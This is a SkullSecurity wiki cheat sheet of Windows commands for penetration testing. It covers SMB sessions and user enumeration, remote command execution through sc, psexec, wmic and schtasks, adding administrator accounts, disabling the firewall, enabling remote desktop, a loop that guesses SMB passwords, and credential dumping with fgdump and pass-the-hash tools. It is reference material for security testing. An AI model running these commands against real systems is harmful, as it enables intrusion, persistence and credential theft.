Windows Commands

From SkullSecurity
Jump to navigation Jump to search
The printable version is no longer supported and may have rendering errors. Please update your browser bookmarks and please use the default browser print function instead.

Recon

nslookup

  • Types of record: NS, A, HINFO, MX, TXT, CNAME, SOA, RP, PTR, SRV
nslookup <site>
  • Interactive mode:
nslookup
> [name or ip]
> server [server ip]
> set type=any
> ls -d [target_domain] [> filename]
> view [filename]
  • No recurse:
> set norecurse
> set recurse

Scanning

tracert

Parameters

  • -d -- don't resolve names
  • -h <N> -- max number of hops (default 30)
  • -j <hostlist> -- use loose source routing
  • -w <N> -- wait for Nms before timing out (default 4000)

SMB session

Establishing a null session

net use \\<target> "" /u:""

Establishing an authenticated session

net use \\<target> <password> /u:<username>

Mount a share

net use * \\<target>\<share> <password> /u:<username>
net use * \\<target>\<share> <password> /u:<machinename>\<username>
net use * \\<target>\c$ <password> /u:<username>

Dropping SMB sessions

net use \\<target> /del

Dropping all SMB sessions (bad idea)

net use * /del

Pulling credentials (w/ SMB session)

Pulling credentials

enum -U <target>
enum -G <target>

user2sid

  • Outputs in the form S-X-Y-target_sid-RID
user2sid \\<target> <machine_name>

sid2user

  • Requires spaces instead of dashes
sid2user \\<target> 5 <target_sid> <N>
for /L %i in (1000, 1, 1050) do @sid2user \\<target> 5 <target_sid> %i

Exploitation

Finding client-side programs

dir /s "c:\Program Files"
dir /s /b "c:\Program Files\*.exe"

Service interaction

List running services

sc query

List all services

sc query state= all

List all service names

sc query state= all | find "SERVICE_NAME"

Query service information

sc query <servicename>
sc qc <servicename>

Start a service

sc config <servicename> start= demand
sc start <servicename>

Starting telnet

sc query tlntsvr
sc config tlntsvr start= demand
sc start tlntsvr

Starting terminal services

sc query termservice
sc config termservice start= demand
sc start termservice

Using sc to invoke an executable

net use \\<target> <password> /u:<username>
sc \\<target> create <name> binpath= <command>
sc \\<target> start <name>

Making that service invoke another executable

sc \\<target> <name> create binpath= "cmd.exe /k <command>"

Variables

Finding environmental variables

set

Finding a specific variable

set <variable>
echo %<variable>%
set username
set path
set systemroot
echo %systemroot%
cd %systemroot%
etc.

Users and groups

Listing users

net user

Creating a user

net user <username> <password> /add

Listing groups

net localgroup

Creating a group

net localgroup <groupname> /add

Adding a user to a group

net localgroup <groupname> <username> /add

Adding a user to the telnet users group

net user <username> <password> /add
net localgroup TelnetClients /add
net localgroup TelnetClients <username> /add

Adding a user to the terminal services group

net localgroup "Remote Desktop Users" <username> /add

List administrators

net localgroup administrators

Add an administrator

net user <username> %lt;password> /add
net localgroup administrators <username> /add

Remove a user from a group

net localgroup <group> <username> /del

Delete a user

net user <username> /del

Firewall interaction

Help

netsh /?

Show config

netsh firewall show config

Open a specific port

netsh firewall add portopening protocol = <TCP|UDP> port = <port> name = <comment> scope = custom addresses = <address/CIDR>

Remove the port opening

netsh firewall del portopening protocol = <TCP|UDP> port = <port>

Disable the firewall completely (bad idea)

netsh firewall set opmode disable

Opening the firewall for telnet

netsh firewall add portopening protocol = TCP port = 23 name = telnet mode = enable scope = custom addresses = <address>

Opening the firewall for terminal services

netsh firewall set service type = remotedesktop mode = enable scope = custom addresses = <address>

Opening the firewall for SSH

netsh firewall add portopening protocol = TCP port = 22 name = sshd mode = enable scope = custom addresses = <address>

Registry interaction

Query a key

reg query <keyname>

Adding a key

reg add <keyname> /v <valuename> /t <type> /d <data>

Export data

reg export <keyname> <filename.reg>

Import data

reg import <filename.reg>

Enabling terminal services

reg add "hklm\system\currentcontrolset\control\terminal server" /v fdenytsconnections /t reg_dword /d 0

netstat

Finding a port

netstat -an | find "<port>"

ipconfig

Dump the DNS cache

ipconfig /displaydns

arp

Dump the ARP cache

arp -a

Looping

/L loop

for /L %i in (<start>,<step>,<stop>) do <command>

Counting

for /L %i in (1,1,255) do @echo %i

Ping scanning

for /L %i in (1,1,255) do @echo 10.10.10.%i & @ping -n 5 10.10.10.%i | find "Reply"

DNS bruteforce

for /L %i in (1,1,255) do @nslookup 10.10.10.%i 2>nul | find "Name" && echo 10.10.10.%i

/F loop

for /F ["<options>"] %i in (<stuff>) do <command>

Looping through passwords

for /F %i in (password.lst) do @echo %i & @net use \\<target> %i /u:<username> 2>nul && pause

Portscanning from a file

for /F %i in (ports.txt) do @nc -n -vv -w3 10.10.10.50 %i

psexec

Using psexec (sysinternals)

  • -s to run as system
  • -c to copy the program to the target first
  • -d to run in "detached" mode (no console)
psexec \\<target> -d -u <user> -p <password> <command>

at/schtasks

Starting the scheduler service

net use \\<target> <password> <username>
sc [\\<target>] query schedule
sc [\\<target>] start schedule

Scheduling with at:

at [\\<target>] <HH:MM><A|P> <command>

Scheduling with schtasks

schtasks /create /tn <taskname> /s <target> /u <user> /p <password> /sc <frequency> /st <starttime> /sd <startdate> /tr <command>

wmic

Running a program

wmic /node:<target> /user:<username> /password:<password> process call create <command>

List processes

wmic /node:<target> /user:<username> /password:<password> process list brief
wmic /node:<target> /user:<username> /password:<password> process where processid="<pid>" delete
wmic /node:<target> /user:<username> /password:<password> process where name="<name>" delete

Passwords

Account lockout

Info on Windows accounts

net accounts
net accounts /domain

fgdump

Options

  • -c -- don't get cached credentials
  • -h <target>
  • -u <username>
fgdump -c -h <target> -u <username>

Pass-the-hash toolkit (psh-toolkit)

Trend finally noticed/deleted these programs, so I don't have their parameters handy

  • whosthere-exe
  • genhash.exe
  • iam.exe

Helpful hints

ftp

Download a file as anonymous

ftp -A -s:ftp-script.txt <host>

The script

get <file>
bye

An even better script, that grabs everything in the base directory

prompt
mget .
bye